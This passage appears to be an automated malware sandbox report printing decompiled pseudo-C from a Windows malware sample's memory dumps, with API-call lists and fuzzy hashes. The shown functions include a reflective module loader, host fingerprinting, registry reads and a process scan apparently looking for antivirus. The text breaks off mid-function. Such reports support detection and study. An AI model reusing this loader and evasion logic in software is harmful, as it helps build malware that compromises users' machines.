                            			}






















                            APIs
                              • Part of subcall function 00CF6466: SysAllocString.OLEAUT32(80000002), ref: 00CF64C3
                              • Part of subcall function 00CF6466: SysFreeString.OLEAUT32(00000000), ref: 00CF6529
                            • SysFreeString.OLEAUT32(?), ref: 00CF8FF5
                            • SysFreeString.OLEAUT32(00CF6843), ref: 00CF8FFF
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00C80F44
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.590451762.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: VirtualAlloc
                            • API String ID: 4275171209-164498762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E00CF6111(void* __ecx) {
                            				signed int _v8;
                            				void* _t15;
                            				void* _t19;
                            				void* _t20;
                            				void* _t22;
                            				intOrPtr* _t23;
                            
                            				_t23 = __imp__;
                            				_t20 = 0;
                            				_v8 = _v8 & 0;
                            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                            				_t10 = _v8;
                            				if(_v8 != 0) {
                            					_t20 = E00CF8D59(_t10 + 1);
                            					if(_t20 != 0) {
                            						_t15 =  *_t23(3, _t20,  &_v8); // executed
                            						if(_t15 != 0) {
                            							 *((char*)(_v8 + _t20)) = 0;
                            						} else {
                            							E00CF677C(_t20);
                            							_t20 = 0;
                            						}
                            					}
                            				}
                            				return _t20;
                            			}










                            APIs
                            • GetComputerNameExA.KERNELBASE(00000003,00000000,00CF1DD9,74B5F710,00000000,?,?,00CF1DD9), ref: 00CF6129
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • GetComputerNameExA.KERNELBASE(00000003,00000000,00CF1DD9,00CF1DDA,?,?,00CF1DD9), ref: 00CF6146
                              • Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: ComputerHeapName$AllocateFree
                            • String ID:
                            • API String ID: 187446995-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                            				intOrPtr _t4;
                            				void* _t10;
                            				void* _t11;
                            				void* _t12;
                            				void* _t14;
                            
                            				_t14 = 1;
                            				_t4 = _a8;
                            				if(_t4 == 0) {
                            					if(InterlockedDecrement(0xcfd23c) == 0) {
                            						E00CF20BE();
                            					}
                            				} else {
                            					if(_t4 == 1 && InterlockedIncrement(0xcfd23c) == 1) {
                            						_t10 = E00CF1000(_t11, _t12, _a4); // executed
                            						if(_t10 != 0) {
                            							_t14 = 0;
                            						}
                            					}
                            				}
                            				return _t14;
                            			}









                            APIs
                            • InterlockedIncrement.KERNEL32(00CFD23C), ref: 00CF91A1
                              • Part of subcall function 00CF1000: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00CF91B4,?), ref: 00CF1013
                            • InterlockedDecrement.KERNEL32(00CFD23C), ref: 00CF91C1
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Interlocked$CreateDecrementHeapIncrement
                            • String ID:
                            • API String ID: 3834848776-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 34%
                            			E00CF5974(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                            				intOrPtr _v12;
                            				void* _v18;
                            				char _v20;
                            				intOrPtr _t15;
                            				void* _t17;
                            				intOrPtr _t19;
                            				void* _t23;
                            
                            				_v20 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosw");
                            				_t15 =  *0xcfd2a4; // 0x247a5a8
                            				_t4 = _t15 + 0xcfe39c; // 0x3178944
                            				_t20 = _t4;
                            				_t6 = _t15 + 0xcfe124; // 0x650047
                            				_t17 = E00CF8F16(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                            				if(_t17 < 0) {
                            					_t23 = _t17;
                            				} else {
                            					_t23 = 8;
                            					if(_v20 != _t23) {
                            						_t23 = 1;
                            					} else {
                            						_t19 = E00CF97DE(_t20, _v12);
                            						if(_t19 != 0) {
                            							 *_a16 = _t19;
                            							_t23 = 0;
                            						}
                            						__imp__#6(_v12);
                            					}
                            				}
                            				return _t23;
                            			}











                            APIs
                              • Part of subcall function 00CF8F16: SysFreeString.OLEAUT32(?), ref: 00CF8FF5
                              • Part of subcall function 00CF97DE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00CF6186,004F0053,00000000,?), ref: 00CF97E7
                              • Part of subcall function 00CF97DE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00CF6186,004F0053,00000000,?), ref: 00CF9811
                              • Part of subcall function 00CF97DE: memset.NTDLL ref: 00CF9825
                            • SysFreeString.OLEAUT32(00000000), ref: 00CF59D7
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: FreeString$lstrlenmemcpymemset
                            • String ID:
                            • API String ID: 397948122-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E10001B3D(void* __eax, intOrPtr _a4) {
                            
                            				 *0x10004150 =  *0x10004150 & 0x00000000;
                            				_push(0);
                            				_push(0x1000414c);
                            				_push(1);
                            				_push(_a4);
                            				 *0x10004148 = 0xc; // executed
                            				L100010D6(); // executed
                            				return __eax;
                            			}




                            APIs
                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(1000136B,00000001,1000414C,00000000), ref: 10001B5B
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: DescriptorSecurity$ConvertString
                            • String ID:
                            • API String ID: 3907675253-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF8D59(long _a4) {
                            				void* _t2;
                            
                            				_t2 = RtlAllocateHeap( *0xcfd238, 0, _a4); // executed
                            				return _t2;
                            			}





                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E10001E8D(void* __eax) {
                            				char _v8;
                            				void* _v12;
                            				void* _t17;
                            				long _t23;
                            				long _t25;
                            				long _t28;
                            				intOrPtr* _t33;
                            				void* _t34;
                            				intOrPtr* _t35;
                            				intOrPtr _t37;
                            
                            				_t34 = __eax;
                            				_t17 = E100018E1( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                            				if(_t17 != 0) {
                            					_t28 = 8;
                            					goto L8;
                            				} else {
                            					_t33 = _v8;
                            					_t28 = E10001854( &_v8, _t33, _t34);
                            					if(_t28 == 0) {
                            						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                            						_t23 = E100010DC(_t33, _t37); // executed
                            						_t28 = _t23;
                            						if(_t28 == 0) {
                            							_t25 = E100015BC(_t37, _t33); // executed
                            							_t28 = _t25;
                            							if(_t28 == 0) {
                            								_push(_t25);
                            								_push(1);
                            								_push(_t33);
                            								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
                            									_t28 = GetLastError();
                            								}
                            							}
                            						}
                            					}
                            					_t35 = _v12;
                            					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
                            					E10001E78(_t35);
                            					L8:
                            					return _t28;
                            				}
                            			}














                            APIs
                              • Part of subcall function 100018E1: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,10001EB7,?,?,?,?,00000002,?,?), ref: 10001906
                              • Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 10001928
                              • Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 1000193E
                              • Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 10001954
                              • Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 1000196A
                              • Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 10001980
                              • Part of subcall function 10001854: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,10001EC5,?,?,?,?,?,?,00000002), ref: 1000188B
                              • Part of subcall function 10001854: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 100018C0
                              • Part of subcall function 100010DC: LoadLibraryA.KERNELBASE(?,?,?,00000000,?,?,?,00000002), ref: 10001112
                              • Part of subcall function 100010DC: lstrlenA.KERNEL32(?), ref: 10001128
                              • Part of subcall function 100010DC: memset.NTDLL ref: 10001132
                              • Part of subcall function 100010DC: GetProcAddress.KERNEL32(?,00000002), ref: 10001195
                              • Part of subcall function 100010DC: lstrlenA.KERNEL32(-00000002), ref: 100011AA
                              • Part of subcall function 100010DC: memset.NTDLL ref: 100011B4
                              • Part of subcall function 100015BC: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 100015EA
                              • Part of subcall function 100015BC: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001642
                              • Part of subcall function 100015BC: GetLastError.KERNEL32 ref: 10001648
                            • GetLastError.KERNEL32(?,?), ref: 10001EFA
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 33504255-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E00CF3402(void* __ecx, signed char* _a4) {
                            				void* _v8;
                            				void* _t8;
                            				signed short _t11;
                            				signed int _t12;
                            				signed int _t14;
                            				intOrPtr _t15;
                            				void* _t19;
                            				signed short* _t22;
                            				void* _t24;
                            				intOrPtr* _t27;
                            
                            				_t24 = 0;
                            				_push(0);
                            				_t19 = 1;
                            				_t27 = 0xcfd330;
                            				E00CF94FB();
                            				while(1) {
                            					_t8 = E00CF523C(_a4,  &_v8); // executed
                            					if(_t8 == 0) {
                            						break;
                            					}
                            					_push(_v8);
                            					_t14 = 0xd;
                            					_t15 = E00CF978C(_t14);
                            					if(_t15 == 0) {
                            						HeapFree( *0xcfd238, 0, _v8);
                            						break;
                            					} else {
                            						 *_t27 = _t15;
                            						_t27 = _t27 + 4;
                            						_t24 = _t24 + 1;
                            						if(_t24 < 3) {
                            							continue;
                            						} else {
                            						}
                            					}
                            					L7:
                            					_push(1);
                            					E00CF94FB();
                            					if(_t19 != 0) {
                            						_t22 =  *0xcfd338; // 0x3179b48
                            						_t11 =  *_t22 & 0x0000ffff;
                            						if(_t11 < 0x61 || _t11 > 0x7a) {
                            							_t12 = _t11 & 0x0000ffff;
                            						} else {
                            							_t12 = (_t11 & 0x0000ffff) - 0x20;
                            						}
                            						 *_t22 = _t12;
                            					}
                            					return _t19;
                            				}
                            				_t19 = 0;
                            				goto L7;
                            			}














                            APIs
                              • Part of subcall function 00CF94FB: GetProcAddress.KERNEL32(36776F57,00CF341A), ref: 00CF9516
                              • Part of subcall function 00CF523C: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00CF5267
                              • Part of subcall function 00CF523C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00CF5289
                              • Part of subcall function 00CF523C: memset.NTDLL ref: 00CF52A3
                              • Part of subcall function 00CF523C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00CF52E1
                              • Part of subcall function 00CF523C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00CF52F5
                              • Part of subcall function 00CF523C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CF530C
                              • Part of subcall function 00CF523C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00CF5318
                              • Part of subcall function 00CF523C: lstrcat.KERNEL32(?,642E2A5C), ref: 00CF5359
                              • Part of subcall function 00CF523C: FindFirstFileA.KERNELBASE(?,?), ref: 00CF536F
                              • Part of subcall function 00CF978C: lstrlen.KERNEL32(?,00000000,00CFD330,00000001,00CF3435,00CFD00C,00CFD00C,00000000,00000005,00000000,00000000,?,?,?,00CF568F,00CF5073), ref: 00CF9795
                              • Part of subcall function 00CF978C: mbstowcs.NTDLL ref: 00CF97BC
                              • Part of subcall function 00CF978C: memset.NTDLL ref: 00CF97CE
                            • HeapFree.KERNEL32(00000000,00CFD00C,00CFD00C,00CFD00C,00000000,00000005,00000000,00000000,?,?,?,00CF568F,00CF5073,00CFD00C,?,00CF5073), ref: 00CF3451
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                            • String ID:
                            • API String ID: 983081259-0
                            • Opcode ID: 0c919c1c69f0b29b033cae1fcb024c00815bc17cca6168ccd7ec7782b88381ed
                            • Instruction ID: 0dbb40f5317f608d745473a175a49ad88d32a835f4c5ccaea2e130cc509bf490
                            • Opcode Fuzzy Hash: 0c919c1c69f0b29b033cae1fcb024c00815bc17cca6168ccd7ec7782b88381ed
                            • Instruction Fuzzy Hash: D5012D7560028CBADB515FE6CC81B7D7E95DB45354F60003ABF45C6050C6708E42E667
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF2AFE(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                            				void* _t15;
                            				void* _t21;
                            				signed int _t23;
                            				void* _t26;
                            
                            				if(_a4 != 0) {
                            					_t15 = E00CF5974(_a4, _a8, _a12, __edi); // executed
                            					_t26 = _t15;
                            				} else {
                            					_t26 = E00CF63A4(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                            					if(_t26 == 0) {
                            						_t23 = _a8 >> 1;
                            						if(_t23 == 0) {
                            							_t26 = 2;
                            							HeapFree( *0xcfd238, 0, _a12);
                            						} else {
                            							_t21 = _a12;
                            							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                            							 *__edi = _t21;
                            						}
                            					}
                            				}
                            				return _t26;
                            			}








                            APIs
                            • HeapFree.KERNEL32(00000000,?,00000000,80000002,74B5F710,?,?,74B5F710,00000000,?,00CF5CC9,?,004F0053,03179378,00000000,?), ref: 00CF2B4B
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 530f384bfb1c10940c7128f5683d6ccd73126531c60d9cf4e487f29eb4f858fb
                            • Instruction ID: e7291b1f8c2e0ce905022736695c8cb657590cacc56d472a611ef9e328335f78
                            • Opcode Fuzzy Hash: 530f384bfb1c10940c7128f5683d6ccd73126531c60d9cf4e487f29eb4f858fb
                            • Instruction Fuzzy Hash: 29014B3210064DEBCF66DF94CC01FBA3BB5AF04750F158118FF1A9A160D7318A20EB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E00CF3651(intOrPtr* __edi) {
                            				intOrPtr _v8;
                            				char _v12;
                            				intOrPtr _v16;
                            				intOrPtr _t15;
                            				intOrPtr* _t21;
                            
                            				_t21 = __edi;
                            				_push( &_v12);
                            				_push(__edi);
                            				_v8 = 0x1d4c0;
                            				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                            				while(1) {
                            					_v16 = _t15;
                            					Sleep(0x1f4); // executed
                            					if(_v12 == 4) {
                            						break;
                            					}
                            					if(_v8 == 0) {
                            						L4:
                            						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                            						continue;
                            					} else {
                            						if(_v8 <= 0x1f4) {
                            							_v16 = 0x80004004;
                            						} else {
                            							_v8 = _v8 - 0x1f4;
                            							goto L4;
                            						}
                            					}
                            					L8:
                            					return _v16;
                            				}
                            				goto L8;
                            			}









                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 00CF3699
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 69391b80874d21d65c54d8e88990d2df2f92fd81ea6f6b2ddbbeee9db5b59729
                            • Instruction ID: 85b62bd35726487f965d785e094878376731bd39db0826591abb272a2cc1a93d
                            • Opcode Fuzzy Hash: 69391b80874d21d65c54d8e88990d2df2f92fd81ea6f6b2ddbbeee9db5b59729
                            • Instruction Fuzzy Hash: 60F0C475D01258FBDB04DB95C988AFDB7B8FF08304F1080AAE612A7240D7B46B84DF56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF315A(void* __edx, void* __edi, void* _a4) {
                            				int _t7;
                            				int _t13;
                            
                            				_t7 = E00CF69C1(__edx, __edi, _a4,  &_a4); // executed
                            				_t13 = _t7;
                            				if(_t13 != 0) {
                            					memcpy(__edi, _a4, _t13);
                            					 *((char*)(__edi + _t13)) = 0;
                            					E00CF677C(_a4);
                            				}
                            				return _t13;
                            			}






                            APIs
                              • Part of subcall function 00CF69C1: memcpy.NTDLL(00000000,00000090,00000002,00000002,00CF28D0,00000008,00CF28D0,00CF28D0,?,00CF94B3,00CF28D0), ref: 00CF69F7
                              • Part of subcall function 00CF69C1: memset.NTDLL ref: 00CF6A6C
                              • Part of subcall function 00CF69C1: memset.NTDLL ref: 00CF6A80
                            • memcpy.NTDLL(00000002,00CF28D0,00000000,00000002,00CF28D0,00CF28D0,00CF28D0,?,00CF94B3,00CF28D0,?,00CF28D0,00000002,?,?,00CF50A1), ref: 00CF3176
                              • Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: memcpymemset$FreeHeap
                            • String ID:
                            • API String ID: 3053036209-0
                            • Opcode ID: 19ede30670193b995c5d5db20b1a4b6792fa3a521838883ea8051f015e3fd0f2
                            • Instruction ID: 4a1605442795401366d91561f5e30c521358d21a23fac263db649815081121c6
                            • Opcode Fuzzy Hash: 19ede30670193b995c5d5db20b1a4b6792fa3a521838883ea8051f015e3fd0f2
                            • Instruction Fuzzy Hash: 7FE08C3640112D7BCB522A94DC01EFFBF6CDF597A1F004025FF088A211DA32CA50A7E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 68%
                            			E00CF244A() {
                            				char _v264;
                            				void* _v300;
                            				int _t8;
                            				intOrPtr _t9;
                            				int _t15;
                            				void* _t17;
                            
                            				_t15 = 0;
                            				_t17 = CreateToolhelp32Snapshot(2, 0);
                            				if(_t17 != 0) {
                            					_t8 = Process32First(_t17,  &_v300);
                            					while(_t8 != 0) {
                            						_t9 =  *0xcfd2a4; // 0x247a5a8
                            						_t2 = _t9 + 0xcfee48; // 0x73617661
                            						_push( &_v264);
                            						if( *0xcfd0fc() != 0) {
                            							_t15 = 1;
                            						} else {
                            							_t8 = Process32Next(_t17,  &_v300);
                            							continue;
                            						}
                            						L7:
                            						CloseHandle(_t17);
                            						goto L8;
                            					}
                            					goto L7;
                            				}
                            				L8:
                            				return _t15;
                            			}










                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CF245A
                            • Process32First.KERNEL32(00000000,?), ref: 00CF246D
                            • Process32Next.KERNEL32(00000000,?), ref: 00CF2499
                            • CloseHandle.KERNEL32(00000000), ref: 00CF24A8
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 25e2e92543345d161945df8f51e1bbdce6c7bbd23aaf87492235abb57a2a7132
                            • Instruction ID: 336406dc302a1da75f7eecf7e2a6562893612c4fb4607699f9b01034f89d0ec9
                            • Opcode Fuzzy Hash: 25e2e92543345d161945df8f51e1bbdce6c7bbd23aaf87492235abb57a2a7132
                            • Instruction Fuzzy Hash: 9EF0963220011CABD760AA769D49EFF7B6CEBC5710F000161FB59D2001EA64CA468AAB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E10001799() {
                            				void* _t1;
                            				unsigned int _t3;
                            				void* _t4;
                            				long _t5;
                            				void* _t6;
                            				intOrPtr _t10;
                            				void* _t14;
                            
                            				_t10 =  *0x10004130;
                            				_t1 = CreateEventA(0, 1, 0, 0);
                            				 *0x1000413c = _t1;
                            				if(_t1 == 0) {
                            					return GetLastError();
                            				}
                            				_t3 = GetVersion();
                            				if(_t3 != 5) {
                            					L4:
                            					if(_t14 <= 0) {
                            						_t4 = 0x32;
                            						return _t4;
                            					} else {
                            						goto L5;
                            					}
                            				} else {
                            					if(_t3 >> 8 > 0) {
                            						L5:
                            						 *0x1000412c = _t3;
                            						_t5 = GetCurrentProcessId();
                            						 *0x10004128 = _t5;
                            						 *0x10004130 = _t10;
                            						_t6 = OpenProcess(0x10047a, 0, _t5);
                            						 *0x10004124 = _t6;
                            						if(_t6 == 0) {
                            							 *0x10004124 =  *0x10004124 | 0xffffffff;
                            						}
                            						return 0;
                            					} else {
                            						_t14 = _t3 - _t3;
                            						goto L4;
                            					}
                            				}
                            			}











                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,100019D3), ref: 100017A8
                            • GetVersion.KERNEL32(?,100019D3), ref: 100017B7
                            • GetCurrentProcessId.KERNEL32(?,100019D3), ref: 100017D3
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,100019D3), ref: 100017EC
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: Process$CreateCurrentEventOpenVersion
                            • String ID:
                            • API String ID: 845504543-0
                            • Opcode ID: be86b185e164205b92613c215166423dbb3ce5b8bef7792cf5731e59b1f85228
                            • Instruction ID: 476726ea2d1ce052e5984cf8ea575588ff25578c4e3a38b3fd47c6afe3a87b53
                            • Opcode Fuzzy Hash: be86b185e164205b92613c215166423dbb3ce5b8bef7792cf5731e59b1f85228
                            • Instruction Fuzzy Hash: 81F0AFB06453319BF7429F68AD9A7C53BE4E7097D3F128119E641C61ECEBB089918B4C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 49%
                            			E00CF99FC(void* __ecx, intOrPtr* _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				void _v76;
                            				intOrPtr* _t226;
                            				signed int _t229;
                            				signed int _t231;
                            				signed int _t233;
                            				signed int _t235;
                            				signed int _t237;
                            				signed int _t239;
                            				signed int _t241;
                            				signed int _t243;
                            				signed int _t245;
                            				signed int _t247;
                            				signed int _t249;
                            				signed int _t251;
                            				signed int _t253;
                            				signed int _t255;
                            				signed int _t257;
                            				signed int _t259;
                            				signed int _t338;
                            				signed char* _t348;
                            				signed int _t349;
                            				signed int _t351;
                            				signed int _t353;
                            				signed int _t355;
                            				signed int _t357;
                            				signed int _t359;
                            				signed int _t361;
                            				signed int _t363;
                            				signed int _t365;
                            				signed int _t367;
                            				signed int _t376;
                            				signed int _t378;
                            				signed int _t380;
                            				signed int _t382;
                            				signed int _t384;
                            				intOrPtr* _t400;
                            				signed int* _t401;
                            				signed int _t402;
                            				signed int _t404;
                            				signed int _t406;
                            				signed int _t408;
                            				signed int _t410;
                            				signed int _t412;
                            				signed int _t414;
                            				signed int _t416;
                            				signed int _t418;
                            				signed int _t420;
                            				signed int _t422;
                            				signed int _t424;
                            				signed int _t432;
                            				signed int _t434;
                            				signed int _t436;
                            				signed int _t438;
                            				signed int _t440;
                            				signed int _t508;
                            				signed int _t599;
                            				signed int _t607;
                            				signed int _t613;
                            				signed int _t679;
                            				void* _t682;
                            				signed int _t683;
                            				signed int _t685;
                            				signed int _t690;
                            				signed int _t692;
                            				signed int _t697;
                            				signed int _t699;
                            				signed int _t718;
                            				signed int _t720;
                            				signed int _t722;
                            				signed int _t724;
                            				signed int _t726;
                            				signed int _t728;
                            				signed int _t734;
                            				signed int _t740;
